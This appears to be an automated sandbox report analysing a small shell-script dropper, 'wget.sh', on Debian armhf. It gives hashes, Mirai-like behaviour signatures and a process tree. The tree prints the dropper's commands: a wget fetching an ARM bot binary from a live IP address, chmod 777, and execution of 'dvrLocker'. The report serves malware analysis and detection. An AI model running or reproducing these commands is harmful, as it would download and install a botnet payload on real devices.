Analysis

  • max time kernel
    149s
  • max time network
    112s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    18/10/2024, 09:41

General

  • Target

    wget.sh

  • Size

    420B

  • MD5

    878878ef9a55d128c2917bfb365e4261

  • SHA1

    3f95d013d7602c813cafd4be15c43c37a9c71d2e

  • SHA256

    bd6ee818b79172a3d43e87463157ee94c942a321fd2ed582610962e323d0817a

  • SHA512

    dfb89655ef3662bb93b765211863cdff5101a00edf9f45b741e8c401402ec429196cf97b4c4e54dfbfc7153b3c50c2ae9da5e3fab45d51a96f0f25ca6c365cf6

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Renames itself 2 IoCs
  • Reads process memory 1 TTPs 1 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name 1 IoCs
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/wget.sh
    /tmp/wget.sh
    1⤵
    • Writes file to tmp directory
    PID:647
    • /bin/rm
      rm -rf dvrLocker
      2⤵
        PID:648
      • /usr/bin/wget
        wget http://103.149.87.69/a/b/la.bot.arm -O -
        2⤵
          PID:650
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:677
        • /mnt/dvrLocker
          ./dvrLocker
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Renames itself
          • Reads process memory
          • Changes its process name
          PID:678
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:682
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:694
        • /bin/rm
          rm -rf dvrLocker
          2⤵
            PID:708

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /mnt/dvrLocker

          Filesize

          54KB

          MD5

          be76a190f3b90d5cb00a5cbc15b112a4

          SHA1

          da8903c31f36952390ff4975683504b9ceff05ea

          SHA256

          9258876ed0aaf0ff28b2b68c5e1ebac8680d7dc8b5de2f67e198035b1f1d545e

          SHA512

          0ef32ef56b4cd888974fc1e900be3956ef23e447b4efb3c1231b11dd77596455b9a5f2927c11f2380308deeb5e97b1a8afd76c350d2d70daea9c1b862934b771